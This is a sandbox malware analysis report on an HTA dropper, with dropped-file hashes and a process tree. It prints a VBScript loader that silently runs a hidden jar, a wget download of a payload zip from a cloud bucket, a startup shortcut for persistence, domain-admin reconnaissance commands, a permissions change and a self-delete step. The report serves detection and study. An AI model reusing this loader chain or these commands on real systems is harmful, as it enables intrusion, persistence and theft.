File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.092333052586487
Encrypted:	false
SSDEEP:	6:TxT7y8oKERbnpUNqntAiloN7aZ5SubPGA5syPeERXMoN7aZ5SubPGA3Gfu2yIWKf:hGZBntdW+HSubPGNU+HSubPGEVDe7
MD5:	BC75D052E226C2F0806A628FBD9BD4B3
SHA1:	FA28231803E1438E6A70C0862F9E6C46863EDDBB
SHA-256:	769EACCD1BB1A0CB70CE75007D871A1833976E21E9AA8E05DB0265B9D87D6202
SHA-512:	7876A8168DCAF3296DE320791AC6734FE7FE80710360DA767B3426F9A4DDC056D01AF2D8CB76F2CFFC63FAC495F25E05A1609A1940B867C2C4AE51F18F525EBF
Malicious:	true
Reputation:	unknown
Preview:	Option Explicit..Dim WshShell, javawPath, resJarPath, cmd..Set WshShell = CreateObject("WScript.Shell")..javawPath = """C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe""".resJarPath = """C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar"""..cmd = javawPath & " -jar " & resJarPath..WshShell.Run cmd, 0, False..Set WshShell = Nothing..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\swiftcopy.pdf

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	PDF document, version 1.4, 2 pages
Category:	dropped
Size (bytes):	9459
Entropy (8bit):	7.859630104280078
Encrypted:	false
SSDEEP:	192:Epq2kXVBE73Thhi6STTPZ9sPk25DuhZYdZ4cNUu8CHk5ztI9KSFcrK:YziALi6STTR9fOy7+4iICEbI9KNrK
MD5:	B33A3A023783CFB6F9B63AF90B0C03D5
SHA1:	9EF41918CA466AFFE27C2E53BADE60CB5083184D
SHA-256:	8BCBA87DF6D459A573441FB848B90451D65BCE3A0F2AC08844C098922672B734
SHA-512:	F93F0A2C757995803791703884084C4660AB32F79D865985C098DB116729CFA67446800D86B9DAA40A6DBF0CA27F921E4E0A674D99020A7BB5BB4AC46716EE3E
Malicious:	false
Reputation:	unknown
Preview:	%PDF-1.4.%.....1 0 obj <</ColorSpace[/Indexed/DeviceRGB 255(.A\|/R..K........I..B}.A{.D..F..J..E..E..B\|.H..G..Q..C~.C}.G..F..H.,O..D~...$M. F..D~.B}.C~b}.......$I.!G..@z$M..C}"H.N.p...E....Sq.7Y..G..E.-P....%J.&K.'L.&K..............B\|Dd.......C~.F.Ee.........D~,P.......Zw.>_.Ih....&M.j..9Z..F.....H.#J......Q..................7........!J.C^.v......#l....G............Qn.....K..Y.....8.Vs....'N.3U."L..C}.2....O..._..........-.8W.......1S.Mk..>......v..p...N....M..c}.<].....f.%...........F...*v......!z..............E~......Ma.Dl..W.W...c.......\|..Ia.....L.Z...v.p.....+........l........:...B.\)P.....n.3.....F...e.......\tb....\b..}..\n.....'\\.m........n....Di.......J\|o..}..W..St..........7\\.....B\|.....a..2..X.....Gg.......g.....\)k.........s...v..$_,P....p......\|.\b........L..........\b8u.....G.....'S.Sx.f..)]/Subtype/Image/Height 87/Filter/FlateDecode/Type/XObject/Width 739/Length 6162/BitsPerComponent 8>>stream.x...\|.W..G~x,.=.-T.d.5,[.....nC....^ `B....ZH..M

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	164864
Entropy (8bit):	6.360014758507702
Encrypted:	false
SSDEEP:	3072:lzJ+lM+sEvWfROJLhfJpreQ00ws/R3b/rz3qh:CWROJNhpeBUDnq
MD5:	FECF803F7D84D4CFA81277298574D6E6
SHA1:	0FD9A61BF9A361F87661DE295E70A9C6795FE6A1
SHA-256:	81046F943D26501561612A629D8BE95AF254BC161011BA8A62D25C34C16D6D2A
SHA-512:	A4E2E2DFC98A874F7EC8318C40500B0E481FA4476D75D559F2895CE29FBE793A889FB2390220A25AB919DEAC477ADA0C904B30F002324529285BDA94292B48A4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......B...............8.Z...................p....@...............3........................... ......................................................................................................................................................text...$X.......Z..................`..`.data........p.......^..............@....bss.....................................idata...............`..............@....rsrc................t..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6542680
Entropy (8bit):	6.4433676229943115
Encrypted:	false
SSDEEP:	196608:QoH78eE6N7qWijOI8VpWx+IfUY8QroV+xLziR:P8UY8ei
MD5:	F2D3E44AFA5CBBBF41ECB3A87066CBF2
SHA1:	7BE54D798B696C1ECB0999C47FDB24FB2D2E9827
SHA-256:	7C722C4A25A26F7179027B1323ED8E291C48365C6F87345E61EE8D5EBD2E5BA0
SHA-512:	B6F661280DFDD1CEBF696D8CDB51763EAC79D073EB13B7EF5CDE76130CCC54B2E1705969FE15F11225233E747C8FFAE516A3B402410582186DAA838264C6B80C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]d.Dc............(."A..>c..............@A...@...........................d......Pd...@... ...............................a../....a..............c..K....b...............................U.......................a..............................text....!A......"A.................`..`.data...\|....@A......&A.............@....rdata........A.......A.............@..@/4............V.......V.............@..@.bss....\|.....`..........................idata.../....a..0....`.............@....CRT....4.....a.......`.............@....tls..........a.......`.............@....rsrc.........a.......`.............@....reloc........b.......`.............@..B/14...........d......Bc.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.lnk

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=0, Archive, ctime=Fri Jan 3 11:12:38 2025, mtime=Fri Jan 3 11:12:38 2025, atime=Thu Jan 2 23:46:04 2025, length=4710, window=hide
Category:	dropped
Size (bytes):	2829
Entropy (8bit):	2.9847405453156957
Encrypted:	false
SSDEEP:	24:8qXPZnKxDRbREOhA3nuNNiFoiK8wDbiadu4iB/RBAg/:8qXPmDcOy3nuXimiK8wniSu4iJ3l/
MD5:	4ECC66E64D22ACEA5F5D9F249DD51F23
SHA1:	668E15DE8719A1118EB88443065B8CA1C9388CAD
SHA-256:	97008F69F6F94CF1BB3BABE99EF76F73BCEACF27E01EC6A5A738021AD8D4FCC6
SHA-512:	62A72A0C89B31F5EE8A1DAF1C1B7B76AA268C66A76E2FBE5B5B5FB0E4ED232A819E05B6E891985C22FFC67AC40EF1E4D6EE8F78D2B9E2B959295A1C54650E522
Malicious:	false
Reputation:	unknown
Preview:	L..................F.B.. ....)...]...P...]...l.x]..f....................... .:..DG..Yr?.D..U..k0.&...&......95..O...`.P[.\..._y.]......t...CFSF..1......V;w..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......V:w#Z.]...........................p..A.p.p.D.a.t.a...B.V.1....."Z.z..Roaming.@......V:w#ZM\..........................D.%.R.o.a.m.i.n.g.....\.1....."Z.z..MICROS~1..D......V:w#ZX\..............................M.i.c.r.o.s.o.f.t.....T.1.....#Z.a..UProof..>......Y4B#Z.a....$.....................`B'.U.P.r.o.o.f.....\.2.f...#Z.. .start.hta.D......#Z.a#Z.a....%.....................=4..s.t.a.r.t...h.t.a.......p...............-.......o....................C:\Users\Administrator\AppData\Roaming\Microsoft\UProof\start.hta..0.....\.....\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.U.P.r.o.o.f.\.s.t.a.r.t...h.t.a.S.C.:.\.U.s.e.r.s.\.u.s.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.m.i.c.r.o.s.o.f.t.\.v.a.l.t.\.c.r.e.d.s.\.j.r.e.\.j.r.e.-.1...8.\.l.i.b.\.d.e.p.l.o.y.\.s.t.a.r.t...h.t.a.

C:\Users\user\Downloads\swiftcopy.pdf

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	PDF document, version 1.4, 2 pages
Category:	dropped
Size (bytes):	9459
Entropy (8bit):	7.859630104280078
Encrypted:	false
SSDEEP:	192:Epq2kXVBE73Thhi6STTPZ9sPk25DuhZYdZ4cNUu8CHk5ztI9KSFcrK:YziALi6STTR9fOy7+4iICEbI9KNrK
MD5:	B33A3A023783CFB6F9B63AF90B0C03D5
SHA1:	9EF41918CA466AFFE27C2E53BADE60CB5083184D
SHA-256:	8BCBA87DF6D459A573441FB848B90451D65BCE3A0F2AC08844C098922672B734
SHA-512:	F93F0A2C757995803791703884084C4660AB32F79D865985C098DB116729CFA67446800D86B9DAA40A6DBF0CA27F921E4E0A674D99020A7BB5BB4AC46716EE3E
Malicious:	true
Reputation:	unknown
Preview:	%PDF-1.4.%.....1 0 obj <</ColorSpace[/Indexed/DeviceRGB 255(.A\|/R..K........I..B}.A{.D..F..J..E..E..B\|.H..G..Q..C~.C}.G..F..H.,O..D~...$M. F..D~.B}.C~b}.......$I.!G..@z$M..C}"H.N.p...E....Sq.7Y..G..E.-P....%J.&K.'L.&K..............B\|Dd.......C~.F.Ee.........D~,P.......Zw.>_.Ih....&M.j..9Z..F.....H.#J......Q..................7........!J.C^.v......#l....G............Qn.....K..Y.....8.Vs....'N.3U."L..C}.2....O..._..........-.8W.......1S.Mk..>......v..p...N....M..c}.<].....f.%...........F...*v......!z..............E~......Ma.Dl..W.W...c.......\|..Ia.....L.Z...v.p.....+........l........:...B.\)P.....n.3.....F...e.......\tb....\b..}..\n.....'\\.m........n....Di.......J\|o..}..W..St..........7\\.....B\|.....a..2..X.....Gg.......g.....\)k.........s...v..$_,P....p......\|.\b........L..........\b8u.....G.....'S.Sx.f..)]/Subtype/Image/Height 87/Filter/FlateDecode/Type/XObject/Width 739/Length 6162/BitsPerComponent 8>>stream.x...\|.W..G~x,.=.-T.d.5,[.....nC....^ `B....ZH..M

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	16534
Entropy (8bit):	4.749943096481655
Encrypted:	false
SSDEEP:	96:T10ekz1006GzVgJD94GaJHktbujj0Qrpy76A5yXFBV2DJ6UWIULI5Y4K0s9e0WRZ:J50L54aJa6EQ9X8F6gZFv
MD5:	48380DAFEAF4F4A32BFA3B80131AD9D4
SHA1:	1CC8AA7F7CD291C6427E1318756463C513A7DB28
SHA-256:	8EE566A9328BD4914AAEFA7B16A2F2AFD157332506338A2C59173115233A5277
SHA-512:	3847AB319605E605E3A3AFECF6EBE6A0BC3A85D997B3A69FE0EDEF679A4D971855B579170CA02E7EADF4629B275FAFE4D871B984335B20347F24E02E5C8FF402
Malicious:	false
Reputation:	unknown
Preview:	Archive: jre-1.8.zip.. creating: jre/jre-1.8/bin/ .. inflating: jre/jre-1.8/bin/api-ms-win-core-console-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-console-l1-2-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-datetime-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-debug-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-errorhandling-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-fibers-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-file-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-file-l1-2-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-file-l2-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-handle-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-heap-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-interlocked-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-libraryloader-l1-1-0.dll .. inflating: jre/jre-1.8/bin/api-ms-win-core-localization-l1-2-0.dll

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (7240)
Entropy (8bit):	5.244379796350321
TrID:	HyperText Markup Language (12001/1) 66.65% HyperText Markup Language (6006/1) 33.35%
File name:	malw.hta
File size:	70'491 bytes
MD5:	dec60ca60be42e773185a13efa81eb28
SHA1:	5962886e261416527b80e8e0491ca26ad90fdaf6
SHA256:	e742dec81195181de546e67424458e1ba8bdc84ef2602e3b2b0935f16433b6d5
SHA512:	25fcce2bb1f8d7f7447538bf84319bcd1a50b9419ddd6c56bebd21be1a458a6509336a8d3f5f3f411607697147dfc2281d6a769cf15e80a1338f238ab68b342f
SSDEEP:	768:l+lExDFG9Jng/SgQKjuZYJwUqh9lv6RuUUHKNm/Ob62HSmx6CXmTn1U0YAovOauO:lzWOBhhtFT52lf8qQ
TLSH:	21636728FF5CA86FD3B703BE1B5578ACFD2C4473BA980482F41079686668127FB69534
File Content Preview:	<html>.<head>. <hta:application. id="InvisiblePuttyDownloader". applicationname="InvisiblePuttyDownloader". border="none". caption="no". controlbox="no". showintaskbar="no". windowstate="minimize". scroll="no". sysmenu="no". /

Target ID:	0
Start time:	07:54:25
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\malw.hta"
Imagebase:	0x880000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:54:27
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf"
Imagebase:	0x920000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:54:27
Start date:	08/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\swiftcopy.pdf"
Imagebase:	0x7ff651090000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	07:54:29
Start date:	08/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff70df30000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:54:29
Start date:	08/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1584,i,9657057088581335983,7569918057650500138,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff70df30000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:54:36
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:54:36
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:54:36
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe
Wow64 process (32bit):	true
Commandline:	"wget.exe" --user-agent="BlackBerry" -O "jre-1.8.zip" "https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip"
Imagebase:	0x780000
File size:	6'542'680 bytes
MD5 hash:	F2D3E44AFA5CBBBF41ECB3A87066CBF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:55:59
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
Wow64 process (32bit):	true
Commandline:	"unzip.exe" "jre-1.8.zip" -d "jre"
Imagebase:	0x400000
File size:	164'864 bytes
MD5 hash:	FECF803F7D84D4CFA81277298574D6E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:56:11
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
Wow64 process (32bit):	true
Commandline:	"jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\recovery.jar"
Imagebase:	0x7ff7934f0000
File size:	269'952 bytes
MD5 hash:	7270D33BAB4BD8AFE03E6D3F36A51D20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 00000010.00000002.3206788432.0000000015650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 00000010.00000003.3164511187.0000000001314000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:56:11
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Imagebase:	0x740000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:56:11
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:56:15
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
Wow64 process (32bit):	true
Commandline:	"jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\history.jar"
Imagebase:	0xe00000
File size:	269'952 bytes
MD5 hash:	7270D33BAB4BD8AFE03E6D3F36A51D20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 00000013.00000002.3222106413.000000001573A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 00000013.00000003.3211107800.0000000001614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:56:17
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
Wow64 process (32bit):	true
Commandline:	"jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar"
Imagebase:	0xe00000
File size:	269'952 bytes
MD5 hash:	7270D33BAB4BD8AFE03E6D3F36A51D20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 00000014.00000002.3260775914.00000000154C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 00000014.00000003.3228221272.0000000001555000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:56:17
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic computersystem get domain
Imagebase:	0xf30000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:56:17
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:56:19
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\whoami.exe
Wow64 process (32bit):	true
Commandline:	whoami /groups
Imagebase:	0x530000
File size:	58'880 bytes
MD5 hash:	801D9A1C1108360B84E60A457D5A773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:56:19
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:56:20
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\whoami.exe
Wow64 process (32bit):	true
Commandline:	whoami /groups
Imagebase:	0x530000
File size:	58'880 bytes
MD5 hash:	801D9A1C1108360B84E60A457D5A773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:56:20
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:56:20
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net group "Domain Admins" /domain
Imagebase:	0x7b0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:56:20
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:56:20
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 group "Domain Admins" /domain
Imagebase:	0x570000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:56:20
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs"
Imagebase:	0xc10000
File size:	144'896 bytes
MD5 hash:	CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:56:21
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar"
Imagebase:	0xe00000
File size:	269'952 bytes
MD5 hash:	7270D33BAB4BD8AFE03E6D3F36A51D20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 0000001F.00000002.3365267882.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: 0000001F.00000003.3269384093.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	07:56:22
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runEmailJs.vbs"
Imagebase:	0xc10000
File size:	144'896 bytes
MD5 hash:	CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:56:22
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\email.js"
Imagebase:	0x740000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	07:56:23
Start date:	08/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Imagebase:	0xaf0000
File size:	34'446'744 bytes
MD5 hash:	91A5292942864110ED734005B7E005C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	07:56:23
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runDeleteHTA.vbs"
Imagebase:	0xc10000
File size:	144'896 bytes
MD5 hash:	CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:56:24
